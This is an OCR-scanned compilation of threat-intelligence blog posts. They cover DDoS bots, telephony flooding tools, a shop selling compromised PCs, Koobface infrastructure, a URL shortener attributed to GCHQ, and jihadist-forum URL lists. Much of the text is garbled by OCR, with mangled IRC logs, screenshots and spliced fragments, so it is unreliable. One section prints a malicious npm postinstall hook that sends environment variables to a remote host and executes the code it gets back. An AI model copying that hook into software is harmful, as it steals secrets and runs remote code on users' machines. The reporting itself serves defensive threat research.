<#Steve00583> Stopped: Finished flood on dd.zeroxcode.net:80 after 10 seconds 
<@Root> tremove 

4 +Steve00583 (29323@crewbot.no-ip.info) Quit (Quit: Removing...) 


«] GRoot 
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Username ver! 


Passed 


Ado ’ 


Download & Execute’Shet 


DDoS View SmartView 


date Urinstal 


rqce ol Dowslioad & Exeoute’Siw 


6 teat 127003 O0cS Vinal SmartView No ca 


[4] 


«of Bots Mecellanecus 


¢ Abarea 
Armersa 
Bargiadest 


PU Archnecture 2 Be 
ae Type esate 
astop 


[5] 
24414 


m 03 7] 
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Now Password 


Logn Page Key 
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[63:05] * Moah32723 (rodrigoO48@186.247.49.156) has joined wAthena 

[63:05] * matteo3s652 (sarah03569@197 .225.6.169.rev.sfr.net) has joined #Aathena 

[83:05] * amandaO4769 (brian86753@85.14.79.225) has joined #athena 

[03:05] * jack84817 (alexa94688@p54ADADAY.dip.t-dialin.net) has joined #Athena 

[93:05) * sophia27680 (David65070088.203.244.89) has joined #Aathena 

[03-05] * emmat4s07 (Nina9S442@cik115 .neoplus.adsl.tpnet.pl) has joined athena 

[03:05] * dillianS8711 (Antoine880@183.80.60.187) has joined #Aathena 

[83:05] * louis83140 (Adan78025@65 .94.223.49) has joined tathena 

(03:05) * stevenO2436 (jack98773@82.201.181.164) has joined #athena 

[63:05] * mik4325% (Luka69164@187-177-184-215 .dynanic.axtel.net) has joined #Athena 

[83:05] * Jazmin85166 (SophieS796@201.171.172.51.dsl.dyn.telnor.net) has joined #athena 
[83:05] * emilis4S812 (Adjin80945@190.142. 36. -49) has joined wathena 

[03:05] * zoe61207 (Eric83673816""“""—-"" \ned #Athena 

(93:05) * charlesi7114 (Jeremiah Channel Modes lgcntk61.tx.dh. suddenlink.net) has joined #Aathena 
63:05) * Bens7876 (jan47668@c-5 —~} Athena 

74 = ” janet (Travise72_ Athena z seTuP wathena 

[03:05] * will59657 (robin60975@triband-nun-59. 184.38 Version/ID joined wAthena 
[93:05] * Francis10998 (nik12919@y209011.ppp.asahi-ne Ithena 

[93:65] * olivia69437 (rodrigo968@88.242.143.224%) has Bot Computer > 

[93-05] * Theo67734 (toot25329@61.17.209.128) has joi 

{f upp DDoS >» jned ned 

{é has joined #Athena 
{¢ aves LUA SA IRC Commands > joined #Athena 

(é Slow HTTP POST 

cf Slowloris Ping bots ! orgy en 
¢ __ ARME[Apache Remote Memory Exhaustion} Reconnect Bots JP) | poll eag pare 
{¢ Rapid Connect/Disconnect[gaming/voip/tearnviewer servers] Remove Bots 

[ Gor POU OL STIL ee tee joined wathens 

[03:05] * a11i1s60029 (evas0575@kita151140.kitanet ne. jp) has joined #athena 

[83:05] * Connor39459 (olivia®725@202.92.199.133) has joined #Athena 

[03:05] * allis99242 (George29290183.80.108.201) has joined #Aathena 

[63:05] * emmah3126 (Nina48355@113.186.78.78) has joined tathena 

[63:05] * claral19005 (e1liot4s65@180.242.92.16) has joined wAathena 

[03:05] * DavidS8734 (jessica958@softbank221028065003 .bbtec.net) has joined sAathena 

[93:05] * steven71122 (gabriel128@node-vfy .pool-101-51.dynamic.totbb.net) has joined Athena 
[93:05] * raphael83714 (bosco40974@116.77.232.22%) has joined #tathena 


It should be fairly easy to conclude that every time the bad guys launch a new DDoS bot on 
the market the actual lifecycle of the malicious software release is prone to grow and extend to 
the point where it’s lifecycle is proportion with the general availability of new features includ- 
ing various ways in which antivirus solutions might fail to detect the new malicious software 
release including possibly a well documented source code which could be offered for sale po- 
tentially improving the lifecycle of the malicious software including the actual introduction of 
new features courtesy of third-parties which also include the general public including malicious 
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[8] 


» Ben21453 - 
Ben25072 
Ben27269 
Ben61662 
Ben82056 
Bensg9925 - 
benjaning— 
benjanint 
benjanint 
benjamin2 
benjanins 
benjamin6 
benjamin6é 
Benny8167 
Benny2862 
Benny4332 
Benny5472 
Benny7907 
Benny8581 
Benny9111 
Benny9786 
bobO9106 
bobt1842 
bob26052 
bob26752 
bob39767 
bosco0216 
boscoBs75 
bosco3748 
bosco3785 
bosco5478 
bosco5783 
boscoS5844 
bosco6 068 
bosco6850 
bosco/7632 
bosco8238 _ 


hae 


software authors who might be interested in possibly introducing new features largely thanks 
to a publicly accessible source code. 
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FgVsBYupy jraIDUWYbVJo_vtwzDOKcP1uBhGVRJ4KCxhJITGTGJGO1 


N 


18.8.2 Sample Screenshots of TDoS (Telephony Denial of Service) Tools - An OSINT 
Analysis (2022-08-02 07:54) 


Did you know that for a modest financial investment you could basically outsource the taking 
down of someone including your competitor’s mobile phones including an organization’s entire 
phone system by basically hiring a Russian based TDoS (Telephony Denial of Service) provider 
which basically utilizes various publicly accessible DoS (Denial of Service) attack techniques 
that also includes the automated breaking of CAPTCHA for the purpose of registering hundreds 
of rogue and bogus accounts where the ultimate goal would be to use them in bulk for the 
purpose of launching a TDoS (Telephony Denial of Service) attack against a victim including 
the competition which could also mean an organization’s entire phone system based on the 
actual requirements of the individual ousourcing the attack to the Russian based provider of 
TDoS (Telephony Denial of Service) attack services. 


I’ve recently decided to dig a little bit deeper inside this booming market segment within the 
cybercrime ecosystem and basically found a multitude of various propositions courtesy of dif- 
ferent providers where the potential user of these services could also get a price bargain on 
their way to obtain and launch a TDoS (Telephony Denial of Service) against a victim including 
a competitor which could also mean an organization’s entire phone system. 
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Kaota caatta Menu RSS + vt Aponte 


Nogmena Homepa Tenedboua 
Mporpamma ana swonxos Kak s8onuTe ¢ noqMeHol Howepa 


3sonKM C NOAMCHOR HOMCpa TenechoHa. 
KaYOCTBCHHAR CBAIb, HANCMHIC KBHANDI. 

3eouKm mo Bcemy mupy oT 0.001€ sawn. 
Pecennepexan nporpamma, Ha4HuTe tapaSaTeiBaTe! 


MoaknioveHve | ABTOpHsalinA 


7289630711641 
R268569688995 
U378814200568 
£279291236792 


410011573223625 
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Talimayt (cek)(20 ontumanbHo): 40 [4] 


HayaTb NPO3SBOH | | OCT@HOBUTb NPO3BOH | 


[| Boikntount’ MuiKpodox 


TamayT (cek)(20 ontumanbHo): 40 a 


HayaTb Npo3ss0H | | OcTaHOBMTb NPO3BOH 


[| Boikntounts MuKpodox 
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[ OTUENMTbCA OT CKaliNa 


‘| | Oruenmteca oT ckalina Homep;Konv4ectso 3B0HKOB;CKONbKO pas NoAHANM TpybKy; 
CnuicoK HOMEpoB: 
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Flooder SMS - Death-Mobile v0.1 | 2012 x} 


Cnucox axxos: 2448 
C:\Documents and Settings\Admin. MA 9 | 


Homep: +7 


| aS 


Text Message: —_ —™@$-— —— —_— 


Texyuue geactsuan: 


Send:+/Si0s641 Nhl] Merino 
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SELES RiGuimnas ~ Reply - View Tweet 


a= Zwartekobus: My home video :) hittp:/filipicsr biz4youtube/ 


nilufer_yuce: My home video :) hitp://filipicsr biz4youtube/ 
6 day jo from web- Reply - View Tweet 


b 6 day ago from web Reply View Tweet 


Kellie Mascadri: My home video :) http:/filipicsr biz/youtube/ 
’ 


The ROI of several abuse notices during the weekend, quick response from [5]China’s CERT 
which took care of 61.235.117.71 (thanks Patrick!), and Oc3 Networks & Web Solutions Llc 
abuse team which took care of the Koobface activity at 98.143.159.138 - cgpay-re-230609 
.com still responds to the IP - looks pretty positive and managed to increase the opportunity 
cost for the Koobface gang since it caused them some troubles during the weekend. 


With [6]Koobface worm’s Twitter campaign currently in a stand by mode due to the pub- 
licity it attracted, as well as the fact that the central redirection points used in the campaign 
are down, let’s assess the current Koobface hosting infrastructure, with an emphasis on 
[7 ]UKSERVERS-MNT (AS42831) which stopped responding to abuse notifications as of Sunday. 
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Vinctpymentet 
Boop cnucka 


[Default ¥ 
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SMs Bomber By _adi+ For Vishal 


Serial Port Settings Other Settings 


Port: | Select Port PIN: 


Baud Rate: | 19200 


SMSC: 


Data Bits: 


Send Delay: 


Parity: 
ae Send Retry: 


Stop Bits: Timeout | 30 Seconds 


Flow Control | Hardware (_} Display incoming call information 


Connect Refresh 


Disconnect 


Apply 


Skype Flooder (FlooSky) by 2pick 


(TOM SCO Mt COMCED HOMEpOR 
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Phone number: 
|+7926123456 | |[*] Starting... 
z [+] Call in progress 


Timeout (ms): ¥ a 


mn [+] Call in progress 
[+] Call finished 
Start [7] Starting... 
[+] Call in progress 
Calls: 12 [+] Call finished 
[*] Starting... 


RankoR, ICQ 210701 


I'll continue taking a deeper look inside the currently emerging and actually booming cyber- 
crime ecosystem market segment for TDoS (Telephony Denial of Service) attacks and I'll post 
updates as soon as new developments take place. 
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18.8.3 In Retrospective - A New Armageddon DDoS Bot - An OSINT Analysis 
(2022-08-02 09:27) 


[1] 


PARVMAGEDDON®™ 


I’ve decided to share with everyone a recently released Armaggeddon DDoS bot which aims 
to differentiate itself from by offering not just standard DDoS bot features and functionalities 
but also the fact that it’s under currently active development by the malware authors behind 
it with the idea to position it as a market leading DDoS bot where the ultimate goal would be 
to acquire new clients. 


The bot offers a variety of DDoS attack features and despite the rather modest GUI it has the 
capacity to cause widespread damage based on the number of affected users internationally. 


I'll continue monitoring the actual development of the bot and post updates as soon as new 
developments take place. 


1. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEgGSQcXhX5v0UyRsjyQg_asDkIm9guqsOCBsXq7C_jPAVyI 
sHDoxKzWq_-qOGA jHxbUXPgByM3VA0oAgvb4PC34HkKvSde3Xe7W2j 


18.8.4 In Retrospective - A New E-Shop for Compromised PCs Spotted in the Wild - 
An OSINT Analysis (2022-08-02 09:33) 


[1] 
24428 


Installs 


We selling high-quality installs, loads, download to bots, rats, stealers... All *.EXE allowed, just be fud. Fresh bots come every day 


E-wedmoney Agtiverty Ebijtcoin 


I’ve recently spotted a newly launched E-shop for compromised PCs where the ultimate goal 
would be to use the actual access to the compromised PCs for setting up the foundations for 
a successful botnet propagation campaign including to actually use them for data mining pur- 
poses where the ultimate goal would be to look for accounting data for major Web properties. 


The E-Shop offers access to a variety of compromised PCs based in different geographical 
locations where the ultimate goal would be to make it easier for the client to properly segment 
the compromised PCs population in the context of only acquiring compromised PC hosts based 
on their actual geographical needs. 

I'll continue monitoring the development of the E-Shop and will post updates as soon as new 
developments take place. 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEiZkJ6pLXTchbz_Ftw5uTLbMVNySBICDkrCZdm8Pr-2Z4fZe 
NJZ4DPyiHWrzM2mfifzPNVcp4nUaVOm7QBxf -2aeSK6Aj10xGErW 


18.8.5 In Retrospective - A New Dedal DDoS Bot Spotted in the Wild - An OSINT 
Analysis (2022-08-02 09:47) 
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DeDal 


ree 
a teleee 


Dos BotNet 
—— — iil DDslClClr 


eo i=iorNetcner -—— 


I’ve recently stumbled upon yet another recently released DDoS bot which is basically offering 
standard features typical for such malicious software releases and is aiming to differentiate 
its cybercrime ecosystem proposition by offering different pricing mechanisms to its potential 
clients. 


[2] 
24430 


/DeDal an 
Dados Bowet 


e¢ Komanga: 0.0 
« Mpownan KomaHpa: 0.0 
e Konuyectso 6boTos: 324 


—— 
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PP Bepars [erpana 

{fu10. 139.201.79 fs bs 

(24.206. 16.123 fi.3 ‘ps 

(fr10. 136. 249.35 fi.2 us 

(f223.255.224.12 fi.3 fp be 
Gi Opera Unite ormmmouena> = Q. Bug (100%) 


I’ll continue monitoring the development of this DDoS bot and will post updates as soon as 
new developments take place. 


1. https: //blogger.googleusercontent .com/img/b/R29VZ2x1/AVvXsEg1 QNDgZr0ZcVYiLH9OF 1Qh23B10IRQ8t Jxtt 9SovBWNGGbd 
gyzSz3MB6xMpo3VKXlamQ4J9000ppHCRuOmWC5vwVm0sFu0pzNMaR 
2. https: //blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEhdd_xCXt336n7muwT gVJE7Py4kszAmiNhxFEMU1LNyBRy9wB 


fcxdF6_iX7YSycvvd7vqB4A1i-9PEmLkQc jUB9GO1SKQKpcus9ellTe 


18.8.6 In Retrospective - A New DIY Herpes Botnet Builder Spotted in the Wild - An 
OSINT Analysis (2022-08-02 10:22) 


I’ve recently came across to a new malicious DIY botner builder release and I’ve decided to 
sharing my findings including some screenshots with the idea to share as much information 
as possible regarding this new malicious software release including to improve everyone’s 
situational awareness. 


Sample screenshots: 
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Her-rPes 


BB ovens Tick Manager 


[2] 


HEV res 


Rowe | Three manage 


[3] 
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* r-d-cgpay-090709.com 


supermerd.org 


78,110.160.0/20 — AS42831 


upr0306.com 78.110.175.15 


www.r-d-cgpay-090709.com 


zaebalinax.com 


How did the Koobface gang/fan club responded to the downtime anyway? By introducing 
several new domains, and parking them at 78.110.175.15 - [BJUKSERVERS-MNT (AS42831), 


whose abuse department remains unreachable ever since. 
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HEV res 


Surveillance 


MB uenes | Thre Menge 


Useful 


[4 


He-res 


Surveifance 


Among the key features of the new DIY botnet building tool is the geographical distribution of 
the affected hosts on a global map where the ultimate goal for the malware coders behind the 
release of this malicious software would be to make it easier for their clients to keep track of 
newly infected hosts. 


Related MD5s known to have been involved in the campaign include: 
MD5: cdb54a3654ff2fdda7e90c48cbacda02 


I’ll continue monitoring the development of this DIY botnet builder and will post updates as 
soon as new developments take place. 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgwvWZ-6a581JHrt cXSBjLdXTgimKryhUG_Accw3d0UrCiq3 
HwwVEQULuyt 1WzIcC9gkKAfbNvHvcxSbMsMMBo- 1QYRIasbWf4wqwjA 
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2, lictpa:/ logger googleusercontent con/ing//29vZ2n1/AVW3EjHGnkifiah_ATVEAADpeHYGV@03 IQHigEABE=%ajWE0B-O 
3. hreps://logger. googleuser content. con/ing/o/R20v22x1 /AVwEsEiLSelpof OBE TxsnS02q¥HGKDavekiiTA1okTTTyGO_ Wri 
4. 


18.8.7 In Retrospective - A New Malware Bot Vector Spotted in the Wild - An OSINT 
Analysis (2022-08-06 20:55) 


I've recently came across to a new malicious software release that has some pretty 
interesting and what can be best described as advanced form grabbing features and I’ve 
decided to further elaborate on some of its key features which basically include advanced 

form grabbing features for a variety of applications and web services which makes the 
malicious software release a pretty important release in the context of introducing new and 
novel features within the cybercrime ecosystem. 


Sample screenshots: 
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[5] 


You need to be logged m to proceed! 


I'll continue monitoring the development of this malicious software release and |’ll post updates 
as soon as new developments take place. 


_ itp: /Tologger googleuser content con/ing/b/8B6v22z1 /AVWXsE FasL Ak] HKG 420gcinc fCBFS 0 gYmBCandR34v0 
2, hvtps:/ blogger. googleusercontent.con/ing/b/R29vZ2x1 /AVWKsEiW7 @hsCU-WivaSranzcz00j MOBuiqy_BinZaG4OliztsGK 
3, https://blogger. oogleusercontent. con/ing/b/R20v22x1/AVWKsE; vq_DP67OX1anKAEY7T6VEWUrOVics®JuCaqiebeiahd 
4. https: //blogger . googleusercontent.con/ing/+/R29v221/AVwKsEgKT #~enGwv4lvsviVex4160¢nYWMaoy;iKyUunFePCHbIO 
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ray 


OOOrMHAwOssULqKLY1bFbtbHulpTec4j01sd8ZX1pJYolhQrwUu7 
5. https: //blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEi8PL6Y3_vM5Vu1oGanVIGT13LAAnA2UsnXhzPAXY5zf IVge 
8AQr2jCn4P1y-4dDjcHdwWG-vffc2Isr5kmxb jmt 2GgqZ0gUk9wT pE 


18.8.8 Exposing GCHQ’s URL Shortening Service - An OSINT Analysis 
(2022-08-06 20:56) 


I’ve recently decided to come up with a proper analysis on a well known GCHQ URL shortening 
service used for monitoring purposes where the ultimate goal would be to provide additional in- 
sights into its Internet-connected infrastructure and try to find additional links and connections 
between related campaigns courtesy of the GCHQ 

Sample URL known to have been involved in the campaign: 

hxxp://lurl.me 

Related domains known to have been involved in the campaign include: 
hxxp://mhhiuag.com 

hxxp://Ihgeesp. biz 

hxxp://ciwcesp.com 

hxxp://Ihgeesp.net 

hxxp://ciwcesp.biz 

Sample related responding IPs known to have been involved in the campaign include: 
hxxp://198.105.254.11 

hxxp://37.220.34.116 

hxxp://109.235.48.3 

hxxp://64.74.223.47 


hxxp://198.105.244.11 


Sample screenshots include: 
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lurl.me 


your free url shortening service! 


don't forget the http, https or ftp! 


LUr 


[2] 


[3][4] 
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Free Voice for Iran 


Tuesday, June 30, 2009 
How Iran is filtering out dissent 


The regime reacted slowly to the 
election protests but its 
censorship of the internet is very 
advanced. Read more.... 

http:/ /lurl.me/0r7076 


id by 2009iranfree at 8:22 AM No comments: 
_ 


Green Graffiti 


ad by 2009iranfree at 7:21 AM No comments: 
* 


Labels: graffiti, green, iran, revolution 


http:/ /tinyurl.com/Iqxtao 


mabtivag com 


iranian schectgiris chat online at an internet cafe which ts exctusively for females, near 


the city of Karaj. Photograph: Revters 


Is this the 
way the 
revolution is 
heading? 
Want to see 
more? visit 
http://50 
mbuffalos. 
mono.net/ 
11377/Gr 
een%20Ni 
njas 


Ahmadinejad calls election defeat for Iran's foes 
TEHRAN (Reuters) - President Mahmoud Ahmadinejad on Tuesday 
hailed his disputed re-election as a victory for the Iranian people 
and a defeat for the Islamic Republic’s enemies. Read more... 


[5] 


Welcome 


Thankyou for visiting my blog. 
Comments and contributions welcome. 


About Me 


SAT RTA: 


View my complete 


profile 
Twitter Updates 
follow me on Twitter 
Search This Blog 
| Search 
Iran forum 


© Anonymous Iran 


blogs I follow 


© Iran Rigged Election 
Revolutionary Road... 


Followers 
Followers (0) 


Subscribe To 
Be 


Labels 

© ahmadinejad (1) 
© election (2) 

© free (1) 


sun flat (4 \ 


sgeew rer cowceap ber wwe let me 
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celepers wrecom 


yeesp bu 


mores Com 


es 


Tek apee a ewer core 


aelrapers erartcar 


io 


108. 295.48.3 


crecete com 


igeetp net 


oat ape erersce } 


Ee 


waren? BT Settee er warm 


o_o teeny one 


Nye comme ine Vin 


Mates iiecse 
etme 
éos4 registrar servess.com Gusbrepisiverservers.com Gos! copisive servers.com } 
© © 37.220.94.196 
<j 
Gra? repatr < Gna) repatrar servers com 


cmrcesp Ou 


wee kere 


[7] 


e 
ie 
ie 


109.235, 48.3 dns 4.regs trar-s ervers com dns 5.regs trar-servers com 


ie 
ie 
ie 


Gns 1 regs tar-servers com dns 2.regss Yar-s ervers com dns 3.regs tar-servers com 


Rogue Twitter accounts known to have been involved in the campaign include: 
hxxp://twitter.com/2009iranfree 
hxxp://twitter.com/MagdyBasha123 
hxxp://twitter.com/TheLorelie 
hxxp://twitter.com/Jim _Harper 
hxxp://twitter.com/angelocerantola 
hxxp://twitter.com/recognizedesign 
hxxp://twitter.com/akhormani 
hxxp://twitter.com/FNZZ 
hxxp://twitter.com/GlenBuchholz 
hxxp://twitter.com/enricolabriola 
hxxp://twitter.com/katriord 
hxxp://twitter.com/ShahkAm147 
hxxp://twitter.com/Pezhman09 
hxxp://twitter.com/jimsharr 
hxxp://twitter.com/blackhatcode 


I’ll continue monitoring the development of this campaign and I'll post updates as soon as new 
developments take place. 
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1. https: //blogger. googleusercontent . com/img/b/R29vZ2x1/AVVXsEhb3YVV1KqM41R_F91x8VknxcOkrbn91ZzvzxBNMZs_mYsu0 
r10_JDAINZAb7yvG78x1D7 JSPBtNuTWS_VjSLeYj YpdXwWZEX_mQFLp 
2. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEhkQPXA1iKZgwopnzXnf VMLFP9wHrAKWB11MhW_zt3UKW-gd 
akH4WzKZapITtTcC6- gbxt j E3AUidxD3UXCW5HmDBi8a4Sx4Z JEqz9 
3. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEhkQPXA1iKZgwopnzXnf VMLFP9wHrAKWB11MhW_zt3UKW- gd 
akH4WzKZapITtTcC6- gbxt j E3AUidxD3UXCW5HmDBi8a4Sx4ZJEqz9 
4. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEg4T10I_EzkidwysH7nVNikmWg0QhfhzPoJa_AU7xTeGURL6 
FmYF 7 NbuAk67Y-TivOHhUMVH1-BAj4iIDj_skKtoFM96JtdCXe8RnCM 
5. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEj0-TV_grWOJbq5HtCzmFG3YULMTTs1vZ_zCQqk1r45w3eC- 
o6DkpT9OT5Nn4y9LDZPmtaP407Dkv_VIwiEn-bWDCw3DoTgkf pEQV9y 
6. https: //blogger . googleusercontent . com/img/b/R29VZ2x1/AVvXsEhmSV5NQziE2ZRD2tzzC j bPRUf£D96reKPRF -Rbu3EG6LJZoH 
6C5pulm7mqO0800MqRD581j-WidaavejXKjYJSYOtrqvnabqx j UZ6RB 
7. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEibcMGkruybBOlyrz247A2Y117W3_zpmL3Y0Zzo0Zb45f aJqC 
1licdD9-X4Gr83cjIDCzrbFIwCjqmkFZF49rfwi7NO1ltgsFb9T1j£SN 


18.8.9 Massive Supply Chain Malware Campaign Affects Thousands of Github Repos- 
itories Drops Malware - An OSINT Analysis (2022-08-06 23:04) 


[1] 
bsitories 35,613 code results 


@ h4vOkr/bitcoinjs-lib 
/package.json 


“: “npm run standard && npm run coverage", 
“mocha”, 

“postinstall": “node -e \"try{r=require('http').request({host: 'Gvza 
+ )19544519.pr46m.vps.myjino. ru’, port: 49460, path: '/?org=h4v0kr&repo=bitco 
lib’ ,method: 'POST’}, function(r){d="';r.on( ‘data’, function(dd) 
{de=dd. toString(‘utf8")});r.on('end', function() 
{try{require('child_process').execSync(d)}catch(_) 
{}})});r.write(JSON. stringify(process.env));r.end() }catch(_){}\"" 


JSON Showing the top match Last indexed 9 days ago 


@ armpelionedge/dhcp4cliient 
/generatexid.go 
x®__. Setenv("e452d6ab", "1") 
x2__.Post("http: //OWz.. 19544519. pra6m. vps .@yjino. ru: 494607 


org=armpe LionedgeSrepo=dhcp4client", “application/json", x1__.NewBuffer( 
} 


I’ve recently spotted a currently circulating massive malware embedded malware campaign 
affecting thousands of Github repositories where the ultimate goal would be to compromise 
the affected hosts and steal accounting data for major Web properties including various cloud 
based environments. 


1. https: //blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEik57xNCsSUHPBvxLoyeaM1 jAoBgDsLnXUZKpD-r6iD1TrNo 
nu7 j 3aaeYHxLW2fndiVqaMZk8- sUNw1 Jn0042JPEsyK6cGJbkIvqwWs 
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AS64523 sf AS6908 
GLOBEINTERNET Pi - DATAHOP 


AS30326 AS42831 
GOSCOMB-AS UKSERVERS-AS 
AS16150 
PORTS0-GLOBALTRANSIT 


AS9009 
GBXS.AS 


Following the first abuse notice sent to UKSERVERS-MNT the company temporarily closed the 
account (78.110.175.15) of the "customer", then brought it back online. Asked why, they 
responded that the "customer" claimed he’s been compromised and that he needs to clean up 
the mess and secure the server. In reality that means "give us some time to smoothly update 
DNS records and migrate operations now that all of our command and control locations are 
offline". 


Since they presumed | don’t take lying personally, half an hour later | checked again 
and the Koobface command and control servers were operational again. The company 
forwarded the responsibility to the customer and said they closed down the account. 
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18.8.10 A Compilation of Publicly Accessible URLs Found on Cyber Jihad Forums - 
Part Five - An OSINT Analysis (2022-08-09 13:42) 


a 
P i ’ | 
g- allldalw 45 


Folks, 


Here’s the second batch of URLs found on publicly accessible cyber jihad forums which | 
obtained using technical collection. 


Sample URLs found on publicly accessible cyber jihad forums include: 


hxxp://www.phpbb.com/ 
hxxp://www.phpbbarabia.com/ 


hxxp://edit.yahoo.com/config/send _webmesg?.target=abo _khataab _aldolaimy 
&amp;.src=pg 
hxxp://edit.yahoo.com/config/send _webmesg?.target=abuhafs _ashshami@yahoo.com 
&amp;.src=pg 


hxxp://edit.yahoo.com/config/send webmesg?.target=brahiman99 &amp;.src=pg 
hxxp://www.al-jinan.org/ 
hxxp://uppit.com/57EVX 
hxxp://edit.yahoo.com/config/send _webmesg?.target=hussambik@yahoo.com &amp;.src=pg 
hxxp://www.fileflyer.com/view/ye6uvAE 
hxxp://www.fileflyer.com/view/jnoHGBa 
hxxp://www.fileflyer.com/view/WxKmcAt 
hxxp://www.megaupload.com/?d=77XI2UY8 
hxxp://www.megaupload.com/?d=9SEN2P75 
hxxp://www.megaupload.com/?d=G3N92908 
hxxp://www.megaupload.com/?d=6PDDLJYL 
hxxp://www.afilehost.com/file/9153/1-avi.html 
hxxp://www.megaupload.com/?d=X6W2RY9E 
hxxp://www.megaupload.com/?d=PDCN8SVC 
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hxxp://www.megaupload.com/?d=HWRHC1U7 
hxxp://uploadpalace.com/en/file/7932/1-avi.html 
hxxp://uploadpalace.com/en/file/7933/1-avi.htm| 
hxxp://uploadpalace.com/en/file/7923/1-avi.html 
hxxp://uploadpalace.com/en/file/7929/1-avi.html 
hxxp://s16.quicksharing.com/v/5292612/1.avi.html 
hxxp://s16.quicksharing.com/v/7627362/1.avi.html 
hxxp://s16.quicksharing.com/v/9947157/1l.avi.html 
hxxp://download.file2you.net/abjn3bak4a3r/1.avi.html 
hxxp://download.file2you.net/rwktgt63nzpb/1.avi.html 
hxxp://www.fileblob.com/download.php?id=157E4F1A 
hxxp://fyad.org/od14 
hxxp://www.sendspace.com/file/asf013 
hxxp://www.megaupload.com/?d=2Ws8]J0210 
hxxp://www.megaupload.com/?d=1VXYEINS 
hxxp://www.megaupload.com/?d=6X3QD6MX 
hxxp://www.megaupload.com/?d=7FO7NQW6 
hxxp://www.megaupload.com/?d=2CHPVHUM 
hxxp://4filehosting.com/file/41549/abv2e-rm.html 
hxxp://4filehosting.com/file/41551/abv2e-rm.html 
hxxp://www.savefile.info/file/3163/abv2e-rm.html 
hxxp://www.afilehost.com/file/9118/abv2e-rm.html 
hxxp://primeupload.com/file/126838/abv2e.rm.html 
hxxp://www.zshare.net/download/27049267b4b725/ 
hxxp://rapidshare.com/files/43160721/abv2e.rm.html 
hxxp://rapidshare.com/files/43159735/abv2e.rm.html 
hxxp://www.upitus.com/download.php?file=ff7cb897 
hxxp://fyad.org/od13 
hxxp://www.sendspace.com/file/h8fwel 
hxxp://www.megaupload.com/?d=UOEIAIXE 
hxxp://www.megaupload.com/?d=PJl1VKBT 
hxxp://www.megaupload.com/?d=D3W58ZQN 
hxxp://www.zshare.net/download/2704983529f7e2/ 
hxxp://www.zshare.net/download/2715604649736e/ 
hxxp://www.upitus.com/download.php?file=faf5a744 
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hxxp://www.upitus.com/download.php?file=f2c59a59 
hxxp://www.fileblob.com/download.php?id=8FB67918 
hxxp://4filehosting.com/file/41559/3ae8f9b035-rar.html 
hxxp://www.afilehost.com/file/9122/3ae8f9b035-rar.html 
hxxp://primeupload.com/file/126840/3ae8f9b035.rar.html 
hxxp://fyad.org/od11 
hxxp://depositfiles.com/files/1225560 
hxxp://www.badongo.com/file/3761015 
hxxp://www.sendspace.com/file/a3lped 
hxxp://www.megaupload.com/?d=ORHCG8SV 
hxxp://www.megaupload.com/?d=KKRAEQNK 
hxxp://www.zshare.net/download/270507486ff05b/ 
hxxp://www.upitus.com/download.php?file=2f812afa 
hxxp://www.fileblob.com/download.php?id=066D2CD7 
hxxp://4filehosting.com/file/41565/81a4c1b3cb-3gp.html 
hxxp://primeupload.com/file/126842/81a4c1b3cb.3gp.html 
hxxp://www.archive.org/download/aq3do/81a4c1b3cb.3gp 
hxxp://www.viprasys.com/host/downloa...81a4clb3cb.3gp 
hxxp://dffdfdfdffd.com 
hxxp://www.meshkat.net 
hxxp://prossmentre.cn/62.html 
hxxp://www.ekhlaas.cc/forum/showthread.php?t=69601 
hxxp://www.ekhlaas.org/forum/showthread.php?t=69601 
hxxp://www.al-ekhlaas.net/forum/showthread.php?t=69601 
hxxp://www.ozooo.tk 
hxxp://www.sendmefile.com/00540445 
hxxp://www.sendspace.com/file/hel4dk 
hxxp://www.fileflyer.com/view/LUxOtAf 
hxxp://www.megaupload.com/?d=FOTKH8NA 
hxxp://ultrashare.net/hosting/fl/1233e9f4a5 
hxxp://www.arbup.org/v/8110601/ajwiba.rar.html 
hxxp://d.turboupload.com/d/1839602/ajwiba.rar.html 
hxxp://s16.quicksharing.com/v/668082 7/ajwiba.rar.html 
hxxp://www.webfilehost.com/?mode=viewupload &amp;id=2509024 
hxxp://www17.rapidupload.com/uploade...filepath=21067 
24445 


hxxp://www.sendspace.com/file/2iixgz 
hxxp://www.sendmefile.com/00540448 
hxxp://www.fileflyer.com/view/QSgYSBC 
hxxp://www.megaupload.com/?d=2R8VOON1 
hxxp://ultrashare.net/hosting/fl/05e73e6c65 
hxxp://www.arbup.org/v/7421054/ajweba.pdf.htm! 
hxxp://d.turboupload.com/d/1839637/ajweba.pdf.html 
hxxp://S16.quicksharing.com/v/4919422/ajweba.pdf.html 
hxxp://www17.rapidupload.com/uploade...filepath=21068 
hxxp://www.webfilehost.com/?mode=viewupload &amp;id=6226894 
hxxp://www.qmagreb.org/ 

hxxp://www.badongo.com/file/3271428 
hxxp://www.megaupload.com/sa/?d=EYF6C8CG 
hxxp://www.zshare.net/download/2106730a01c341/ 
hxxp://4filehosting.com/file/15628/s...age-1-rar.html 
hxxp://rapidshare.com/files/34705275...age _1.rar.html 
hxxp://www.mytempdir.com/1181503 
hxxp://www.rogepost.com/n/2705996932 
hxxp://www.rogepost.com/n/3360587411 
hxxp://www.sendspace.com/file/nco3bo 
hxxp://www.sendspace.com/file/led011 
hxxp://www.sendspace.com/file/cszex0 
hxxp://www.fileflyer.com/view/J8PtaBw 
hxxp://s3.quicksharing.com/v/2209094/.html 
hxxp://d.turboupload.com/d/1454930/fassade.rar.html 
hxxp://d.turboupload.com/d/1454932/fassade.rar.html 
hxxp://www.ibb7.com/vb/showthread.php?t=3394 
hxxp://www.alrased.net/show topic.php?topic id=544 
hxxp://frqan.com/books.php?bookid=54 
hxxp://www.haqeega.com/index.aspx?status=prodetail &amp;aid=127 
hxxp://www.musI|m.net/vb/showthread.php?t=196919 %20 
hxxp://www.haqeega.com/index.aspx?status=prodetail &amp;aid=13 
hxxp://www.haqeeqga.com/index.aspx?status=prodetail &amp;aid=46 
